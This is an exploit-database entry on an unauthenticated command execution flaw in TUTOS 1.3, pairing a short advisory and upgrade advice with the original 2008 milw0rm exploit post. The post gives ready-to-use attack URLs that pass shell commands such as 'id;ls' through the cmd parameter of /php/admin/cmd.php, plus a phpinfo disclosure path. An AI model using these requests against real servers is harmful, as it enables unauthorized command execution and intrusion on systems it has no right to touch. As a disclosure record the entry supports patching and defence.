TUTOS Command Execution Vulnerability

vendor:

TUTOS

by:

H-T TeaM {HouSSaMix _ ToXiC350}

9.3

CVSS

HIGH

Command Execution

CWE

Product Name: TUTOS

Affected Version From: 1.3

Affected Version To: 1.3

Patch Exists: YES

Related CWE: N/A

CPE: a:tutos:tutos

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

TUTOS Command Execution Vulnerability

TUTOS is vulnerable to command execution vulnerability. An attacker can execute arbitrary commands on the vulnerable system by sending a specially crafted HTTP request to the vulnerable server. The vulnerable parameter is 'cmd' which is located in 'cmd.php' file. An attacker can access the file without any authentication and execute arbitrary commands on the vulnerable system.

Mitigation:

Upgrade to the latest version of TUTOS or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

######################################################################################
# AUTHOR : H-T TeaM {HouSSaMix _ ToXiC350}                                           #
# HOME : http://no-hack.net           						     #
# Script :  TUTOS (Tested in version 1.3) other versions may also be affected.       #
# Download : http://www.tutos.org/homepage/index.html                                #       
# BUG :      Command Execution Vulnerability                                         #		
######################################################################################

(~)| 3xpl0it4t10n

 -1- : Command Execution

    http://[TARGEt]/[path_TUTOS]/php/admin/cmd.php?cmd=[your command]  

   >> we dont need a permission admin for access to '/php/admin/cmd.php' :d 
	
    exemple :  http://site.com/tutos/php/admin/cmd.php?cmd=id;ls
	
	or we can just  enter into : http://[TARGEt]/[path_TUTOS]/php/admin/cmd.php
	and right the command in [ CMD(*) ] and press enter :d

-2- Get phpinfo 

   http://[TARGEt]/[path_TUTOS]/php/admin/phpinfo.php 

(~)| Explantion By Video :
     http://no-hack.net/video/tutos.zip
	

# greezt : CoNaN  , GoLd_M , RoMaNcYxHaCkEr , and all muslims Hackers 

######################################################################################
#                  H-T TeaM {HouSSaMix _ ToXiC350}                                   #
######################################################################################

# milw0rm.com [2008-01-07]